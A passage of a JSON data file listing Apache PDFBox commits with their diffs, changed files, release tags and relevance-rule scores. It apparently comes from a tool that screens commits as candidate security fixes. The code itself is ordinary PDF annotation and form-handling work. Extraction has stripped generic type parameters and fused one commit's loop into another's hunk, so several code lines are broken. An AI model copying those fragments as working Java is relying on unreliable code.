elliptical annotation introduced in PDF 1.3 specification .", - "+ * This is the class that represents a rectangular or elliptical annotation introduced in PDF 1.3", - "+ * specification .", - " *", - "@@ -78,3 +79,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " /**", - "- * This will set the border effect dictionary, specifying effects to be applied when drawing the line.", - "+ * This will set the border effect dictionary, specifying effects to be applied when drawing the", - "+ * line.", - " *", - "@@ -89,3 +91,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " /**", - "- * This will retrieve the border effect dictionary, specifying effects to be applied used in drawing the line.", - "+ * This will retrieve the border effect dictionary, specifying effects to be applied used in", - "+ * drawing the line.", - " *", - "@@ -95,11 +98,8 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " {", - "- COSDictionary be = (COSDictionary) getCOSObject().getDictionaryObject(COSName.BE);", - "- if (be != null)", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.BE);", - "+ if (base instanceof COSDictionary)", - " {", - "- return new PDBorderEffectDictionary(be);", - "- }", - "- else", - "- {", - "- return null;", - "+ return new PDBorderEffectDictionary((COSDictionary) base);", - " }", - "+ return null;", - " }", - "@@ -107,4 +107,5 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " /**", - "- * This will set the rectangle difference rectangle. Giving the difference between the annotations rectangle and", - "- * where the drawing occurs. (To take account of any effects applied through the BE entry forexample)", - "+ * This will set the rectangle difference rectangle. Giving the difference between the", - "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", - "+ * through the BE entry for example)", - " *", - "@@ -119,4 +120,5 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " /**", - "- * This will get the rectangle difference rectangle. Giving the difference between the annotations rectangle and", - "- * where the drawing occurs. (To take account of any effects applied through the BE entry forexample)", - "+ * This will get the rectangle difference rectangle. Giving the difference between the", - "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", - "+ * through the BE entry for example)", - " *", - "@@ -126,11 +128,8 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " {", - "- COSArray rd = (COSArray) getCOSObject().getDictionaryObject(COSName.RD);", - "- if (rd != null)", - "- {", - "- return new PDRectangle(rd);", - "- }", - "- else", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.RD);", - "+ if (base instanceof COSArray)", - " {", - "- return null;", - "+ return new PDRectangle((COSArray) base);", - " }", - "+ return null;", - " }", - "@@ -138,3 +137,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " /**", - "- * This will set the border style dictionary, specifying the width and dash pattern used in drawing the line.", - "+ * This will set the border style dictionary, specifying the width and dash pattern used in", - "+ * drawing the line.", - " *", - "@@ -150,3 +150,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " /**", - "- * This will retrieve the border style dictionary, specifying the width and dash pattern used in drawing the line.", - "+ * This will retrieve the border style dictionary, specifying the width and dash pattern used in", - "+ * drawing the line.", - " *", - "@@ -164,12 +165,14 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", - " }", - "- ", - "+", - " /**", - "- * This will set the difference between the annotations \"outer\" rectangle defined by", - "- * /Rect and the border.", - "- * ", - "- *

    This will set an equal difference for all sides

    ", - "- * ", - "+ * This will set the difference between the annotations \"outer\" rectangle defined by /Rect and", - "+ * the border.", - "+ *", - "+ *

    ", - "+ * This will set an equal difference for all sides

    ", - "+ *", - " * @param difference from the annotations /Rect entry", - " */", - "- public void setRectDifferences(float difference) {", - "+ public void setRectDifferences(float difference)", - "+ {", - " setRectDifferences(difference, difference, difference, difference);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "63e6857b4a18d72b2effcc4096c41b550d60c3a0", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528050958, - "hunks": 18, - "message": "PDFBOX-3353: make public git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832781 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "index 377adb6ed..b2b981817 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "@@ -24,3 +24,3 @@ import org.apache.pdfbox.pdmodel.font.PDFont;", - " */", - "-class AppearanceStyle", - "+public class AppearanceStyle", - " {", - "@@ -56,3 +56,3 @@ class AppearanceStyle", - " */", - "- void setFont(PDFont font)", - "+ public void setFont(PDFont font)", - " {", - "@@ -76,3 +76,3 @@ class AppearanceStyle", - " */", - "- void setFontSize(float fontSize)", - "+ public void setFontSize(float fontSize)", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "index 165c8e455..16261b3e2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "@@ -36,3 +36,3 @@ import org.apache.pdfbox.pdmodel.font.PDFont;", - " */", - "-class PlainText", - "+public class PlainText", - " {", - "@@ -51,3 +51,3 @@ class PlainText", - " */", - "- PlainText(String textValue)", - "+ public PlainText(String textValue)", - " {", - "@@ -74,3 +74,3 @@ class PlainText", - " */", - "- PlainText(List listValue)", - "+ public PlainText(List listValue)", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "index 6458d8404..df9dd603b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "@@ -28,3 +28,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Word;", - " /**", - "- * TextFormatter to handle plain text formatting.", - "+ * TextFormatter to handle plain text formatting for annotation rectangles.", - " * ", - "@@ -34,3 +34,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Word;", - "-class PlainTextFormatter", - "+public class PlainTextFormatter", - " {", - "@@ -82,3 +82,3 @@ class PlainTextFormatter", - "- static class Builder", - "+ public static class Builder", - " {", - "@@ -100,3 +100,3 @@ class PlainTextFormatter", - "- Builder(PDAppearanceContentStream contents)", - "+ public Builder(PDAppearanceContentStream contents)", - " {", - "@@ -105,3 +105,3 @@ class PlainTextFormatter", - "- Builder style(AppearanceStyle appearanceStyle)", - "+ public Builder style(AppearanceStyle appearanceStyle)", - " {", - "@@ -111,3 +111,3 @@ class PlainTextFormatter", - "- Builder wrapLines(boolean wrapLines)", - "+ public Builder wrapLines(boolean wrapLines)", - " {", - "@@ -117,3 +117,3 @@ class PlainTextFormatter", - "- Builder width(float width)", - "+ public Builder width(float width)", - " {", - "@@ -123,3 +123,3 @@ class PlainTextFormatter", - "- Builder textAlign(int alignment)", - "+ public Builder textAlign(int alignment)", - " {", - "@@ -129,3 +129,3 @@ class PlainTextFormatter", - "- Builder textAlign(TextAlign alignment)", - "+ public Builder textAlign(TextAlign alignment)", - " {", - "@@ -136,3 +136,3 @@ class PlainTextFormatter", - "- Builder text(PlainText textContent)", - "+ public Builder text(PlainText textContent)", - " {", - "@@ -142,3 +142,3 @@ class PlainTextFormatter", - "- Builder initialOffset(float horizontalOffset, float verticalOffset)", - "+ public Builder initialOffset(float horizontalOffset, float verticalOffset)", - " {", - "@@ -149,3 +149,3 @@ class PlainTextFormatter", - "- PlainTextFormatter build()", - "+ public PlainTextFormatter build()", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "399d7ef280239f47f5ee689b4d073b0d0bbccce5", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532463659, - "hunks": 3, - "message": "PDFBOX-4271: use sha512 instead of md5, use newer plugin git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836584 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index fcbebd90d..f38e659e8 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -109,4 +109,3 @@", - " com.googlecode.maven-download-plugin", - "- ", - "- maven-download-plugin", - "+ download-maven-plugin", - " ", - "@@ -125,3 +124,3 @@", - " ${project.build.directory}/pdfs", - "- 9f129c834bc6f9f8dabad4491c4c10ec", - "+ 66bf4ad470b36079c1e0ceca4438053f32649f964fb1de5cd88babce36c5afc0ba6fa7880bc1c9aac791df872cdfc8dc9851bfd3c75ae96786edd8fac61193ae", - " ", - "@@ -139,3 +138,3 @@", - " ${project.build.directory}/pdfs", - "- d8fccb2fea540ab49bef237f3579546b", - "+ a6efe70574dcde3628271fc1d7aa32cc00095334aa9415e5ebfb96cc20e0f79edd040c0290d5a76b4ced4c6a4343ba4af9567bf12eb7cfe3ec70f1a43202c231", - "
    " - ], - "changed_files": [ - "preflight/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4271": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4271", - "relevance": 2 - } - ] - }, - { - "commit_id": "1f7d51fe972e9cab88cdc052048d613300db2159", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527613647, - "hunks": 1, - "message": "PDFBOX-3353: remove unused import git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832461 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 08631c951..68a59bee0 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -22,3 +22,2 @@ import org.apache.commons.logging.LogFactory;", - " import org.apache.fontbox.util.Charsets;", - "-import org.apache.pdfbox.contentstream.PDFStreamEngine;", - " import org.apache.pdfbox.contentstream.operator.Operator;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "65a3e829469c2433c26f9e272d2eba3897f334e1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530634529, - "hunks": 4, - "message": "PDFBOX-3353: add handler for squiggly annotation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835002 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java", - "index ccabb40b6..7a54d95d2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java", - "@@ -18,5 +18,22 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "+import java.awt.geom.AffineTransform;", - "+import java.io.IOException;", - " import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.pdfbox.cos.COSName;", - "+import org.apache.pdfbox.cos.COSStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDFormContentStream;", - "+import org.apache.pdfbox.pdmodel.PDPatternContentStream;", - "+import org.apache.pdfbox.pdmodel.PDResources;", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDColorSpace;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDPattern;", - "+import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", - "+import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquiggly;", - "+import org.apache.pdfbox.util.Matrix;", - "@@ -45,3 +62,107 @@ public class PDSquigglyAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- //TODO", - "+ PDAnnotationSquiggly annotation = (PDAnnotationSquiggly) getAnnotation();", - "+ PDRectangle rect = annotation.getRectangle();", - "+ float[] pathsArray = annotation.getQuadPoints();", - "+ if (pathsArray == null)", - "+ {", - "+ return;", - "+ }", - "+ AnnotationBorder ab = AnnotationBorder.getAnnotationBorder(annotation, annotation.getBorderStyle());", - "+ PDColor color = annotation.getColor();", - "+ if (color == null || color.getComponents().length == 0)", - "+ {", - "+ return;", - "+ }", - "+ if (Float.compare(ab.width, 0) == 0)", - "+ {", - "+ // value found in adobe reader", - "+ ab.width = 1.5f;", - "+ }", - "+", - "+ // Adjust rectangle even if not empty, see PLPDF.com-MarkupAnnotations.pdf", - "+ //TODO in a class structure this should be overridable", - "+ // this is similar to polyline but different data type", - "+ // all coordinates (unlike painting) are used because I'm lazy", - "+ float minX = Float.MAX_VALUE;", - "+ float minY = Float.MAX_VALUE;", - "+ float maxX = Float.MIN_VALUE;", - "+ float maxY = Float.MIN_VALUE;", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ {", - "+ float x = pathsArray[i * 2];", - "+ float y = pathsArray[i * 2 + 1];", - "+ minX = Math.min(minX, x);", - "+ minY = Math.min(minY, y);", - "+ maxX = Math.max(maxX, x);", - "+ maxY = Math.max(maxY, y);", - "+ }", - "+ rect.setLowerLeftX(Math.min(minX - ab.width / 2, rect.getLowerLeftX()));", - "+ rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", - "+ rect.setUpperRightX(Math.max(maxX + ab.width / 2, rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + ab.width / 2, rect.getUpperRightY()));", - "+ annotation.setRectangle(rect);", - "+", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ {", - "+ setOpacity(cs, annotation.getConstantOpacity());", - "+", - "+ cs.setStrokingColor(color);", - "+", - "+ //TODO we ignore dash pattern and line width for now. Do they have any effect?", - "+", - "+", - "+ // quadpoints spec is incorrect", - "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "+ for (int i = 0; i < pathsArray.length / 8; ++i)", - "+ {", - "+ // Adobe uses a fixed pattern that assumes a height of 40, and it transforms to that height", - "+ // horizontally and the same / 1.8 vertically.", - "+ // translation apparently based on bottom left, but slightly different in Adobe", - "+ //TODO what if the annotation is not horizontal?", - "+ float height = pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5];", - "+ cs.transform(new Matrix(height / 40f, 0, 0, height / 40f / 1.8f, pathsArray[i * 8 + 4], pathsArray[i * 8 + 5]));", - "+", - "+ // Create form, BBox is mostly fixed, except for the horizontal size which is", - "+ // horizontal size divided by the horizontal transform factor from above", - "+ // (almost)", - "+ PDFormXObject form = new PDFormXObject(new COSStream());", - "+ form.setBBox(new PDRectangle(-0.5f, -0.5f, (pathsArray[i * 8 + 2] - pathsArray[i * 8]) / height * 40f + 0.5f, 13));", - "+ form.setResources(new PDResources());", - "+ form.setMatrix(AffineTransform.getTranslateInstance(0.5f, 0.5f));", - "+ cs.drawForm(form);", - "+ try (PDFormContentStream formCS = new PDFormContentStream(form))", - "+ {", - "+ PDTilingPattern pattern = new PDTilingPattern();", - "+ pattern.setBBox(new PDRectangle(0, 0, 10, 12));", - "+ pattern.setXStep(10);", - "+ pattern.setYStep(13);", - "+ pattern.setTilingType(PDTilingPattern.TILING_CONSTANT_SPACING_FASTER_TILING);", - "+ pattern.setPaintType(PDTilingPattern.PAINT_UNCOLORED);", - "+ try (PDPatternContentStream patternCS = new PDPatternContentStream(pattern))", - "+ {", - "+ // from Adobe", - "+ patternCS.setLineCapStyle(1);", - "+ patternCS.setLineJoinStyle(1);", - "+ patternCS.setLineWidth(1);", - "+ patternCS.setMiterLimit(10);", - "+ patternCS.moveTo(0, 1);", - "+ patternCS.lineTo(5, 11);", - "+ patternCS.lineTo(10, 1);", - "+ patternCS.stroke();", - "+ }", - "+ COSName patternName = form.getResources().add(pattern);", - "+ PDColorSpace patternColorSpace = new PDPattern(null, PDDeviceRGB.INSTANCE);", - "+ PDColor patternColor = new PDColor(color.getComponents(), patternName, patternColorSpace);", - "+ formCS.setNonStrokingColor(patternColor);", - "+", - "+ // With Adobe, the horizontal size is slightly different, don't know why", - "+ formCS.addRect(0, 0, (pathsArray[i * 8 + 2] - pathsArray[i * 8]) / height * 40f, 12);", - "+ formCS.fill();", - "+ }", - "+ }", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ LOG.error(ex);", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "1d2fd3df5264ea7bc367dacc0c5b8b1435bdb5da", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523724888, - "hunks": 7, - "message": "PDFBOX-3809: flatten only specified fields git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829151 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "index 5af88cba3..de3ba969b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "@@ -253,2 +253,7 @@ public final class PDAcroForm implements COSObjectable", - " {", - "+ // Nothing to flatten if there are no fields provided", - "+ if (fields.isEmpty()) {", - "+ return;", - "+ }", - "+", - " // for dynamic XFA forms there is no flatten as this would mean to do a rendering", - "@@ -273,2 +278,5 @@ public final class PDAcroForm implements COSObjectable", - " PDPageContentStream contentStream;", - "+", - "+ // get the widgets per page", - "+ Map> pagesWidgetsMap = buildPagesWidgetsMap(fields);", - "@@ -277,2 +285,3 @@ public final class PDAcroForm implements COSObjectable", - " {", - "+ Map widgetsForPageMap = pagesWidgetsMap.get(page.getCOSObject());", - " isContentStreamWrapped = false;", - "@@ -283,3 +292,3 @@ public final class PDAcroForm implements COSObjectable", - " {", - "- if (!(annotation instanceof PDAnnotationWidget))", - "+ if (widgetsForPageMap != null && widgetsForPageMap.get(annotation.getCOSObject()) == null)", - " {", - "@@ -352,3 +361,3 @@ public final class PDAcroForm implements COSObjectable", - " // remove the fields", - "- setFields(Collections.emptyList());", - "+ removeFields(fields);", - "@@ -705,21 +714,2 @@ public final class PDAcroForm implements COSObjectable", - "- private Map buildAnnotationToPageRef() {", - "- Map annotationToPageRef = new HashMap();", - "- ", - "- int idx = 0;", - "- for (PDPage page : document.getPages()) {", - "- try {", - "- for (PDAnnotation annotation : page.getAnnotations()) {", - "- if (annotation instanceof PDAnnotationWidget) {", - "- annotationToPageRef.put(annotation.getCOSObject(), idx);", - "- }", - "- }", - "- } catch (IOException e) {", - "- LOG.warn(\"Can't retriev annotations for page \" + idx);", - "- }", - "- idx++;", - "- } ", - "- return annotationToPageRef;", - "- }", - "- ", - " /**", - "@@ -782,2 +772,73 @@ public final class PDAcroForm implements COSObjectable", - " }", - "+", - "+ private Map> buildPagesWidgetsMap(List fields)", - "+ {", - "+ Map> pagesAnnotationsMap = new HashMap>();", - "+ boolean hasMissingPageRef = false;", - "+ ", - "+ for (PDField field : fields)", - "+ {", - "+ List widgets = field.getWidgets();", - "+ for (PDAnnotationWidget widget : widgets)", - "+ {", - "+ PDPage pageForWidget = widget.getPage();", - "+ if (pageForWidget != null)", - "+ {", - "+ if (pagesAnnotationsMap.get(pageForWidget.getCOSObject()) == null)", - "+ {", - "+ Map widgetsForPage = new HashMap();", - "+ widgetsForPage.put(widget.getCOSObject(), widget);", - "+ pagesAnnotationsMap.put(pageForWidget.getCOSObject(), widgetsForPage);", - "+ }", - "+ else", - "+ {", - "+ Map widgetsForPage = pagesAnnotationsMap.get(pageForWidget.getCOSObject());", - "+ widgetsForPage.put(widget.getCOSObject(), widget);", - "+ }", - "+ }", - "+ else", - "+ {", - "+ hasMissingPageRef = true;", - "+ }", - "+ }", - "+ }", - "+ ", - "+ // TODO: if there is a widget with a missing page reference ", - "+ // we'd need to build the map reverse i.e. form the annotations to the ", - "+ // widget. But this will be much slower so will be omitted for now.", - "+ if (hasMissingPageRef)", - "+ {", - "+ LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", - "+ }", - "+ ", - "+ return pagesAnnotationsMap;", - "+ }", - "+ ", - "+ private void removeFields(List fields)", - "+ {", - "+ for (PDField field : fields) {", - "+ if (field.getParent() == null)", - "+ {", - "+ COSArray cosFields = (COSArray) dictionary.getDictionaryObject(COSName.FIELDS);", - "+ for (int i=0; i 0)", - "+ {", - "+ // Adjust rectangle even if not empty", - "+ // CTAN-example-Annotations.pdf p1", - "+ //TODO in a class structure this should be overridable", - "+ float minX = Float.MAX_VALUE;", - "+ float minY = Float.MAX_VALUE;", - "+ float maxX = Float.MIN_VALUE;", - "+ float maxY = Float.MIN_VALUE;", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ {", - "+ float x = pathsArray[i * 2];", - "+ float y = pathsArray[i * 2 + 1];", - "+ minX = Math.min(minX, x);", - "+ minY = Math.min(minY, y);", - "+ maxX = Math.max(maxX, x);", - "+ maxY = Math.max(maxY, y);", - "+ }", - "+ // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", - "+ rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", - "+ rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", - "+ rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", - "+ annotation.setRectangle(rect);", - "+ }", - "+", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ {", - "+ // The fill color is the /C entry, there is no /IC entry defined", - "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getColor());", - "+ setOpacity(cs, annotation.getConstantOpacity());", - "+", - "+ // in reality, Adobe uses the non stroking color from /DA as stroking color. WTF?", - "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "+ if (ab.dashArray != null)", - "+ {", - "+ cs.setLineDashPattern(ab.dashArray, 0);", - "+ }", - "+ cs.setLineWidth(ab.width);", - "+", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ {", - "+ float x = pathsArray[i * 2];", - "+ float y = pathsArray[i * 2 + 1];", - "+ if (i == 0)", - "+ {", - "+ if (SHORT_STYLES.contains(annotation.getLineEndingStyle()))", - "+ {", - "+ // modify coordinate to shorten the segment", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float x1 = pathsArray[2];", - "+ float y1 = pathsArray[3];", - "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "+ if (Float.compare(len, 0) != 0)", - "+ {", - "+ x += (x1 - x) / len * ab.width;", - "+ y += (y1 - y) / len * ab.width;", - "+ }", - "+ }", - "+ cs.moveTo(x, y);", - "+ }", - "+ else", - "+ {", - "+ cs.lineTo(x, y);", - "+ }", - "+ }", - "+ cs.stroke();", - "+", - "+ // do a transform so that first \"arm\" is imagined flat, like in line handler", - "+ // the alternative would be to apply the transform to the LE shapes directly,", - "+ // which would be more work and produce code difficult to understand", - "+ // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", - "+ if (\"FreeTextCallout\".equals(annotation.getIntent())", - "+ && !LE_NONE.equals(annotation.getLineEndingStyle())", - "+ && pathsArray.length >= 4)", - "+ {", - "+ // check only needed to avoid q cm Q if LE_NONE", - "+ float x2 = pathsArray[2];", - "+ float y2 = pathsArray[3];", - "+ float x1 = pathsArray[0];", - "+ float y1 = pathsArray[1];", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ }", - "+ ", - "+ //TODO display border and text", - "+ // how to set the text color? Apparently red is the default.", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ LOG.error(ex);", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": 